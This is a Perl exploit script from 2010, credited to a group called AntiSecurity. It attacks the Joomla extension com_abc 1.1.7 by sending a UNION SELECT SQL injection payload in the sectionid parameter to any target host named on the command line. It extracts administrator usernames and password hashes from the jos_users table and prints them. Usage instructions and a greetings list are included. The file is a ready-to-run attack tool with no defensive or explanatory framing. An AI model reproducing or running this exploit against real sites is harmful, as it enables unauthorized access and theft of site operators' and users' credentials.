#!/usr/bin/perl #***********************************************************************# # # # [o] ABC Joomla Extension SQL Injection Exploit # # Software : com_abc version 1.1.7 # # Vendor : http://www.airiny.com/ # # Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] # # Contact : public[at]antisecurity[dot]org # # Home : http://antisecurity.org/ # # # # [o] Usage # # root@evilc0de:~# perl abc.pl www.target.com # # # # [o] Greetz # # Angela Zhang stardustmemory aJe martfella pizzyroot Genex # # H312Y yooogy mousekill }^-^{ noname matthews wishnusakti # # skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 # # # # [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia # # # #***********************************************************************# use HTTP::Request; use LWP::UserAgent; my $target = $ARGV[0]; my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid='; my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--'; print "\n[x]===============================================[x]\n"; print "[x] ABC Joomla Extension SQL Injection Exploit [x]\n"; print "[x] [C]oded By AntiSecurity [x]\n"; print "[x]===============================================[x]\n\n"; my $exploit = "http://".$target.$file_vuln.$sql_query; my $request = HTTP::Request->new(GET=>$exploit); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/:(.*):(.*):/g) { my ($username,$password) = ($1,$2); print "[+] $username:$password \n\n"; } else { print "[-] Error, Fail to get admin login.\n\n"; } } else { print "[-] Error, ".$response->status_line."\n\n"; }